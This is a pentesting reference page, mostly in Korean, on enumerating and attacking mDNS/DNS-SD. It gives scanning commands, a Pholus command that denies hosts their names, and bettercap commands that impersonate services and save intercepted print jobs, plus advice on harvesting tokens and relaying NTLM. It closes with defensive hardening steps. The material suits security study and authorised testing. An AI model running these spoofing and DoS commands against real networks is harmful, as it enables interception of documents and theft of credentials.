5353/UDP Multicast DNS (mDNS) and DNS-SD

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ธฐ๋ณธ ์ •๋ณด

Multicast DNS (mDNS)๋Š” ์œ ๋‹ˆ์บ์ŠคํŠธ DNS ์„œ๋ฒ„ ์—†์ด ๋กœ์ปฌ ๋งํฌ ๋‚ด์—์„œ DNS์™€ ์œ ์‚ฌํ•œ ์ด๋ฆ„ ํ•ด์„๊ณผ ์„œ๋น„์Šค ๊ฒ€์ƒ‰์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด ํ”„๋กœํ† ์ฝœ์€ UDP/5353๊ณผ ๋ฉ€ํ‹ฐ์บ์ŠคํŠธ ์ฃผ์†Œ 224.0.0.251 (IPv4) ๋ฐ FF02::FB (IPv6)๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. DNS Service Discovery (DNS-SD, ์ผ๋ฐ˜์ ์œผ๋กœ mDNS์™€ ํ•จ๊ป˜ ์‚ฌ์šฉ๋จ)๋Š” PTR, SRV ๋ฐ TXT ๋ ˆ์ฝ”๋“œ๋ฅผ ํ†ตํ•ด ์„œ๋น„์Šค๋ฅผ ์—ด๊ฑฐํ•˜๊ณ  ์„ค๋ช…ํ•˜๋Š” ํ‘œ์ค€ํ™”๋œ ๋ฐฉ๋ฒ•์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค.

PORT     STATE SERVICE
5353/udp open  zeroconf

๊ณต๊ฒฉ์—์„œ ์ž์ฃผ ํ™œ์šฉํ•  ์ฃผ์š” ํ”„๋กœํ† ์ฝœ ์„ธ๋ถ€์‚ฌํ•ญ:

  • .local ์กด์˜ ์ด๋ฆ„์€ mDNS๋ฅผ ํ†ตํ•ด ํ•ด์„๋ฉ๋‹ˆ๋‹ค.
  • QU (Query Unicast) ๋น„ํŠธ๋Š” ๋ฉ€ํ‹ฐ์บ์ŠคํŠธ ์งˆ๋ฌธ์—๋„ unicast ์‘๋‹ต์„ ์š”์ฒญํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • ๊ตฌํ˜„์ฒด๋Š” ๋กœ์ปฌ ๋งํฌ์—์„œ ์ถœ๋ฐœํ•˜์ง€ ์•Š์€ ํŒจํ‚ท์„ ๋ฌด์‹œํ•ด์•ผ ํ•˜์ง€๋งŒ, ์ผ๋ถ€ ์Šคํƒ์€ ์—ฌ์ „ํžˆ ์ด๋ฅผ ์ˆ˜๋ฝํ•ฉ๋‹ˆ๋‹ค.
  • Probing/announcing์€ ํ˜ธ์ŠคํŠธ/์„œ๋น„์Šค ์ด๋ฆ„์˜ ๊ณ ์œ ์„ฑ์„ ๊ฐ•์ œํ•ฉ๋‹ˆ๋‹ค; ์—ฌ๊ธฐ์— ๊ฐ„์„ญํ•˜๋ฉด DoS/โ€œname squattingโ€ ์ƒํƒœ๋ฅผ ๋งŒ๋“ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

DNS-SD ์„œ๋น„์Šค ๋ชจ๋ธ

์„œ๋น„์Šค๋Š” .local ์•„๋ž˜์—์„œ _._tcp ๋˜๋Š” _._udp ํ˜•ํƒœ๋กœ ์‹๋ณ„๋ฉ๋‹ˆ๋‹ค. ์˜ˆ: _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge) ๋“ฑ. _services._dns-sd._udp.local๋กœ ํƒ€์ž…์„ ๋ฐœ๊ฒฌํ•œ ๋’ค, ๋ฐœ๊ฒฌ๋œ ์ธ์Šคํ„ด์Šค๋ฅผ SRV/TXT/A/AAAA๋กœ ํ•ด์„ํ•˜์„ธ์š”.

๋„คํŠธ์›Œํฌ ํƒ์ƒ‰ ๋ฐ ์—ด๊ฑฐ

  • nmap ๋Œ€์ƒ ์Šค์บ” (ํ˜ธ์ŠคํŠธ์—์„œ ์ง์ ‘ mDNS):
nmap -sU -p 5353 --script=dns-service-discovery <target>
  • nmap ๋ธŒ๋กœ๋“œ์บ์ŠคํŠธ ๋ฐœ๊ฒฌ (์„ธ๊ทธ๋จผํŠธ๋ฅผ ๋ฆฌ์Šค๋‹ํ•˜์—ฌ ๋ชจ๋“  DNS-SD ํƒ€์ž…/์ธ์Šคํ„ด์Šค ์—ด๊ฑฐ):
sudo nmap --script=broadcast-dns-service-discovery
  • avahi-browse (Linux):
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
  • Apple dns-sd (macOS):
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
  • Packet capture with tshark:
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""

ํŒ: ์ผ๋ถ€ ๋ธŒ๋ผ์šฐ์ €/WebRTC๋Š” ๋กœ์ปฌ IP๋ฅผ ์€๋‹‰ํ•˜๊ธฐ ์œ„ํ•ด ์ผ์‹œ์  mDNS ํ˜ธ์ŠคํŠธ๋ช…์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ๋„คํŠธ์›Œํฌ์—์„œ random-UUID.local ํ›„๋ณด๋ฅผ ๋ณด๋ฉด, mDNS๋กœ ํ•ด์„ํ•˜์—ฌ ๋กœ์ปฌ IP๋กœ ํ”ผ๋ฒ—ํ•˜์„ธ์š”.

๊ณต๊ฒฉ

mDNS ์ด๋ฆ„ probing ๊ฐ„์„ญ (DoS / name squatting)

ํ”„๋กœ๋น™ ๋‹จ๊ณ„์—์„œ ํ˜ธ์ŠคํŠธ๋Š” ์ด๋ฆ„์˜ ๊ณ ์œ ์„ฑ์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค. ์Šคํ‘ธํ•‘๋œ ์ถฉ๋Œ๋กœ ์‘๋‹ตํ•˜๋ฉด ํ˜ธ์ŠคํŠธ๋Š” ์ƒˆ ์ด๋ฆ„์„ ์„ ํƒํ•˜๊ฑฐ๋‚˜ ์‹คํŒจํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์„œ๋น„์Šค ๋“ฑ๋ก ๋ฐ ๊ฒ€์ƒ‰์„ ์ง€์—ฐ์‹œํ‚ค๊ฑฐ๋‚˜ ์ฐจ๋‹จํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Example with Pholus:

# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000

์„œ๋น„์Šค ์Šคํ‘ธํ•‘ ๋ฐ ์‚ฌ์นญ (MitM)

๊ด‘๊ณ ๋˜๋Š” DNS-SD ์„œ๋น„์Šค๋ฅผ(ํ”„๋ฆฐํ„ฐ, AirPlay, HTTP, ํŒŒ์ผ ๊ณต์œ )๋ฅผ ์‚ฌ์นญํ•˜์—ฌ ํด๋ผ์ด์–ธํŠธ๋ฅผ ๋‹น์‹ ์—๊ฒŒ ์—ฐ๊ฒฐ๋˜๋„๋ก ์œ ๋„ํ•˜์„ธ์š”. ํŠนํžˆ ๋‹ค์Œ์— ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค:

  • ๋ฌธ์„œ๋ฅผ ์บก์ฒ˜ํ•˜๋ ค๋ฉด _ipp._tcp ๋˜๋Š” _printer._tcp๋ฅผ spoofingํ•˜์„ธ์š”.
  • ํด๋ผ์ด์–ธํŠธ๋ฅผ HTTP/HTTPS ์„œ๋น„์Šค๋กœ ์œ ๋„ํ•˜์—ฌ tokens/cookies๋ฅผ ์ˆ˜์ง‘ํ•˜๊ฑฐ๋‚˜ payloads๋ฅผ ์ „๋‹ฌํ•˜์„ธ์š”.
  • Windows ํด๋ผ์ด์–ธํŠธ๊ฐ€ auth๋ฅผ ํ˜‘์ƒํ•  ๋•Œ NTLM relay techniques์™€ ๊ฒฐํ•ฉํ•˜์—ฌ spoofed services๋ฅผ ์ด์šฉํ•˜์„ธ์š”.

With bettercapโ€™s zerogod module (mDNS/DNS-SD spoofer/impersonator):

# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"

# Show all services seen from a host
> zerogod.show 192.168.1.42
# Show full DNS records for a host (newer bettercap)
> zerogod.show-full 192.168.1.42

# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42

# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42

# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml

Also see generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

์ตœ๊ทผ ๊ตฌํ˜„ ๋ฌธ์ œ ๋ฉ”๋ชจ (์‹ค๋ฌด์—์„œ DoS/์ง€์†์„ฑ์— ์œ ์šฉ)

  • Avahi reachable-assertion ๋ฐ D-Bus crash ๋ฒ„๊ทธ(2023)๋Š” Linux ๋ฐฐํฌํŒ์—์„œ avahi-daemon์„ ์ข…๋ฃŒ์‹œ์ผœ(์˜ˆ: CVE-2023-38469..38473, CVE-2023-1981) ์žฌ์‹œ์ž‘ ์ „๊นŒ์ง€ ๋Œ€์ƒ ํ˜ธ์ŠคํŠธ์˜ ์„œ๋น„์Šค ๊ฒ€์ƒ‰์„ ์ค‘๋‹จ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (CVE-2024-20303)๋Š” ์ธ์ ‘ํ•œ WLAN ํด๋ผ์ด์–ธํŠธ๊ฐ€ ์กฐ์ž‘๋œ mDNS๋ฅผ ๋Œ€๋Ÿ‰ ์ „์†กํ•˜๋„๋ก ํ•˜์—ฌ WLC CPU ์‚ฌ์šฉ๋Ÿ‰์„ ๊ธ‰์ฆ์‹œํ‚ค๊ณ  AP ํ„ฐ๋„์„ ๋Š๊ฒŒ ๋งŒ๋“ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค โ€” ์‹ค๋ฌด์—์„œ ํด๋ผ์ด์–ธํŠธ ๊ฐ•์ œ ๋กœ๋ฐ์ด๋‚˜ ์ปจํŠธ๋กค๋Ÿฌ ๋ฆฌ์…‹์ด ํ•„์š”ํ•  ๋•Œ ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค.
  • Apple mDNSResponder logic error DoS (CVE-2024-44183)๋Š” ์ƒŒ๋“œ๋ฐ•์Šค๋œ ๋กœ์ปฌ ํ”„๋กœ์„ธ์Šค๊ฐ€ Bonjour๋ฅผ ํฌ๋ž˜์‹œ์‹œ์ผœ Apple ์—”๋“œํฌ์ธํŠธ์—์„œ ์„œ๋น„์Šค ๊ฒŒ์‹œ/์กฐํšŒ๊ฐ€ ์ž ์‹œ ์ค‘๋‹จ๋˜๊ฒŒ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค; ํ˜„์žฌ iOS/macOS ๋ฆด๋ฆฌ์Šค์—์„œ ํŒจ์น˜๋˜์—ˆ์Šต๋‹ˆ๋‹ค.
  • Apple mDNSResponder correctness issue (CVE-2025-31222)์€ mDNSResponder๋ฅผ ํ†ตํ•œ ๋กœ์ปฌ ๊ถŒํ•œ ์ƒ์Šน์„ ํ—ˆ์šฉํ–ˆ์œผ๋ฉฐ, ๊ด€๋ฆฌ๋˜์ง€ ์•Š๋Š” Mac/iPhone์—์„œ ์ง€์†์„ฑ ํ™•๋ณด์— ์œ ์šฉํ–ˆ์Šต๋‹ˆ๋‹ค; ์ตœ๊ทผ iOS/macOS ์—…๋ฐ์ดํŠธ์—์„œ ์ˆ˜์ •๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

Browser/WebRTC mDNS ๊ณ ๋ ค์‚ฌํ•ญ

๋ชจ๋˜ Chromium/Firefox๋Š” ํ˜ธ์ŠคํŠธ ํ›„๋ณด๋ฅผ ๋ฌด์ž‘์œ„ mDNS ์ด๋ฆ„์œผ๋กœ ๋‚œ๋…ํ™”ํ•ฉ๋‹ˆ๋‹ค. Chrome ์ •์ฑ… WebRtcLocalIpsAllowedUrls๋ฅผ ๋ฐ€์–ด๋„ฃ๊ฑฐ๋‚˜(chrome://flags/#enable-webrtc-hide-local-ips-with-mdns/Edge ๋™๋“ฑ ์˜ต์…˜์„ ํ† ๊ธ€) ICE๊ฐ€ mDNS ๋Œ€์‹  ํ˜ธ์ŠคํŠธ ํ›„๋ณด๋ฅผ ๋…ธ์ถœํ•˜๋„๋ก ํ•˜๋ฉด ๊ด€๋ฆฌ๋˜๋Š” ์—”๋“œํฌ์ธํŠธ์—์„œ LAN IP๋ฅผ ๋‹ค์‹œ ๋…ธ์ถœ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค; ์„ค์ •์€ HKLM\Software\Policies\Google\Chrome๋ฅผ ํ†ตํ•ด ์ ์šฉ๋ฉ๋‹ˆ๋‹ค.

์‚ฌ์šฉ์ž๊ฐ€ ์ˆ˜๋™์œผ๋กœ ๋ณดํ˜ธ ๊ธฐ๋Šฅ์„ ๋น„ํ™œ์„ฑํ™”ํ•˜๋ฉด(์›นRTC ๋ฌธ์ œ ํ•ด๊ฒฐ ๊ฐ€์ด๋“œ์—์„œ ํ”ํ•จ) ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ๋‹ค์‹œ ์ผ๋ฐ˜ ํ˜ธ์ŠคํŠธ ํ›„๋ณด๋ฅผ ๊ด‘๊ณ ํ•˜๊ธฐ ์‹œ์ž‘ํ•˜๊ณ , ์ด๋Š” mDNS ๋˜๋Š” ICE ์‹œ๊ทธ๋„๋ง์„ ํ†ตํ•ด ์บก์ฒ˜ํ•˜์—ฌ ํ˜ธ์ŠคํŠธ ๋ฐœ๊ฒฌ์„ ๊ฐ€์†ํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋ฐฉ์–ด ๊ณ ๋ ค์‚ฌํ•ญ ๋ฐ OPSEC

  • ์„ธ๊ทธ๋จผํŠธ ๊ฒฝ๊ณ„: mDNS gateway๊ฐ€ ๋ช…์‹œ์ ์œผ๋กœ ํ•„์š”ํ•œ ๊ฒฝ์šฐ๋ฅผ ์ œ์™ธํ•˜๊ณ  224.0.0.251/FF02::FB๋ฅผ ๋ณด์•ˆ ์กด ๊ฐ„์— ๋ผ์šฐํŒ…ํ•˜์ง€ ๋งˆ์„ธ์š”. discovery๋ฅผ ๋ธŒ๋ฆฌ์ง€ํ•ด์•ผ ํ•œ๋‹ค๋ฉด ํ—ˆ์šฉ ๋ชฉ๋ก๊ณผ ์†๋„ ์ œํ•œ์„ ์šฐ์„  ์‚ฌ์šฉํ•˜์„ธ์š”.
  • Windows ์—”๋“œํฌ์ธํŠธ/์„œ๋ฒ„:
  • mDNS๋ฅผ ํ†ตํ•œ ์ด๋ฆ„ ํ•ด์„์„ ์™„์ „ํžˆ ๋น„ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ๊ฐ’์„ ์„ค์ •ํ•˜๊ณ  ์žฌ๋ถ€ํŒ…ํ•˜์„ธ์š”:
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
  • ๊ด€๋ฆฌ๋˜๋Š” ํ™˜๊ฒฝ์—์„œ๋Š” ๊ธฐ๋ณธ ์ œ๊ณต๋˜๋Š” โ€œmDNS (UDP-In)โ€ Windows Defender Firewall ๊ทœ์น™(์ ์–ด๋„ ๋„๋ฉ”์ธ ํ”„๋กœํŒŒ์ผ์—์„œ)์„ ๋น„ํ™œ์„ฑํ™”ํ•˜์—ฌ ์ˆ˜์‹  mDNS ์ฒ˜๋ฆฌ๋ฅผ ๋ฐฉ์ง€ํ•˜๋˜ ํ™ˆ/๋กœ๋ฐ ๊ธฐ๋Šฅ์€ ์œ ์ง€ํ•˜์„ธ์š”.
  • ์ตœ์‹  Windows 11 ๋นŒ๋“œ/GPO ํ…œํ”Œ๋ฆฟ์—์„œ๋Š” ์ •์ฑ… โ€œComputer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocolโ€์„ ์‚ฌ์šฉํ•˜๊ณ  Disabled๋กœ ์„ค์ •ํ•˜์„ธ์š”.
  • Linux (Avahi):
  • ํ•„์š”ํ•˜์ง€ ์•Š์„ ๋•Œ๋Š” ํผ๋ธ”๋ฆฌ์‹ฑ์„ ์ž ๊ทธ์„ธ์š”: /etc/avahi/avahi-daemon.conf์—์„œ disable-publishing=yes๋กœ ์„ค์ •ํ•˜๊ณ  allow-interfaces= / deny-interfaces=๋กœ ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ์ œํ•œํ•˜์„ธ์š”.
  • check-response-ttl=yes๋ฅผ ๊ณ ๋ คํ•˜๊ณ , ์—„๊ฒฉํžˆ ํ•„์š”ํ•˜์ง€ ์•Š๋‹ค๋ฉด enable-reflector=yes๋Š” ํ”ผํ•˜์„ธ์š”; ๋ฐ˜์‚ฌ(reflecting) ์‹œ์—๋Š” reflect-filters= ํ—ˆ์šฉ ๋ชฉ๋ก์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.
  • macOS: ํŠน์ • ์„œ๋ธŒ๋„ท์—์„œ Bonjour ๊ฒ€์ƒ‰์ด ํ•„์š”ํ•˜์ง€ ์•Š๋‹ค๋ฉด ํ˜ธ์ŠคํŠธ/๋„คํŠธ์›Œํฌ ๋ฐฉํ™”๋ฒฝ์—์„œ ์ˆ˜์‹  mDNS๋ฅผ ์ œํ•œํ•˜์„ธ์š”.
  • ๋ชจ๋‹ˆํ„ฐ๋ง: _services._dns-sd._udp.local ์ฟผ๋ฆฌ์˜ ๋น„์ •์ƒ์  ๊ธ‰์ฆ์ด๋‚˜ ์ค‘์š”ํ•œ ์„œ๋น„์Šค์˜ SRV/TXT์˜ ๊ธ‰๊ฒฉํ•œ ๋ณ€๊ฒฝ์ด ๊ฐ์ง€๋˜๋ฉด ๊ฒฝ๋ณด๋ฅผ ์„ค์ •ํ•˜์„ธ์š”; ์ด๋Š” ์Šคํ‘ธํ•‘ ๋˜๋Š” ์„œ๋น„์Šค ์‚ฌ์นญ์˜ ์ง€ํ‘œ์ž…๋‹ˆ๋‹ค.

๋„๊ตฌ ๋น ๋ฅธ ์ฐธ์กฐ

  • nmap NSE: dns-service-discovery and broadcast-dns-service-discovery.
  • Pholus: active scan, reverse mDNS sweeps, DoS and spoofing helpers.
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
  • bettercap zerogod: discover, save, advertise, and impersonate mDNS/DNS-SD services (see examples above).

Spoofing/MitM

์ด ์„œ๋น„์Šค ์ƒ์—์„œ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€์žฅ ํฅ๋ฏธ๋กœ์šด ๊ณต๊ฒฉ์€ ํด๋ผ์ด์–ธํŠธ์™€ ์‹ค์ œ ์„œ๋ฒ„ ๊ฐ„ ํ†ต์‹ ์—์„œ MitM์„ ์ˆ˜ํ–‰ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ํ”„๋ฆฐํ„ฐ์™€์˜ ํ†ต์‹ ์„ MitMํ•˜์—ฌ ๋ฏผ๊ฐํ•œ ํŒŒ์ผ์„ ํš๋“ํ•˜๊ฑฐ๋‚˜ Windows ์ธ์ฆ ๊ฐ™์€ ์ž๊ฒฉ์ฆ๋ช…์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
์ž์„ธํ•œ ๋‚ด์šฉ์€ ๋‹ค์Œ์„ ์ฐธ์กฐํ•˜์„ธ์š”:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

์ฐธ๊ณ ์ž๋ฃŒ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ